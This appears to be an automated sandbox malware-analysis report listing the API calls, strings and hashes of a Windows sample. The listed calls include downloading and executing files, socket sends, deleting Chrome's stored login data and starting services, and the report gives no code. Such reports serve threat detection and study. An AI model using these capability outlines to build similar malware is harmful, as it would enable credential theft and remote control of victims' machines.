                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 88f7f388d9c7b93218fd4f0641b758d3f745da8643f3819d3410be881ff98bf0
                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                  • Opcode Fuzzy Hash: 88f7f388d9c7b93218fd4f0641b758d3f745da8643f3819d3410be881ff98bf0
                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: 0aF$0aF$C:\Users\user\Desktop\FPPhfkcDCh.exe$open
                                                  • API String ID: 2825088817-1214587576
                                                  • Opcode ID: 302ab973e84c4c6dca31aaadbb5e6d6267746a88614dbff31eef066e3f18b118
                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                  • Opcode Fuzzy Hash: 302ab973e84c4c6dca31aaadbb5e6d6267746a88614dbff31eef066e3f18b118
                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID: xdF
                                                  • API String ID: 1771804793-999140092
                                                  • Opcode ID: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                  • Opcode Fuzzy Hash: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • UserProfile, xrefs: 0040BA59
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Opcode Fuzzy Hash: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                  • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                  • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                  • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: cfc75f04b1d898ee0c130a582012c3177bc7e698a05cd4a1bda34677b9042951
                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                  • Opcode Fuzzy Hash: cfc75f04b1d898ee0c130a582012c3177bc7e698a05cd4a1bda34677b9042951
                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Opcode Fuzzy Hash: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                  • GetACP.KERNEL32 ref: 00452593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: 8eF$XPG$XPG
                                                  • API String ID: 4113138495-4157548504
                                                  • Opcode ID: aeda0b89492932c12f20bb2ebc40727bda67ea030b274ae713a59b382de888b7
                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                  • Opcode Fuzzy Hash: aeda0b89492932c12f20bb2ebc40727bda67ea030b274ae713a59b382de888b7
                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3126330168
                                                  • Opcode ID: 1b8314d2076e9d5c703d8fca3d96c61d813be21baf7682ae790ff92cd480d8bc
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 1b8314d2076e9d5c703d8fca3d96c61d813be21baf7682ae790ff92cd480d8bc
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: f92f0177f9ad375755d132dfbdc95623a352f14b94457c2472d6f14809876fc2
                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                  • Opcode Fuzzy Hash: f92f0177f9ad375755d132dfbdc95623a352f14b94457c2472d6f14809876fc2
                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID:
                                                  • API String ID: 745075371-0
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
